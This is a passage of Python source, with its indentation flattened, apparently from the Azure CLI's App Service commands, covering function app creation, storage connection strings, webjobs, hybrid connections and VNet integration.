hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
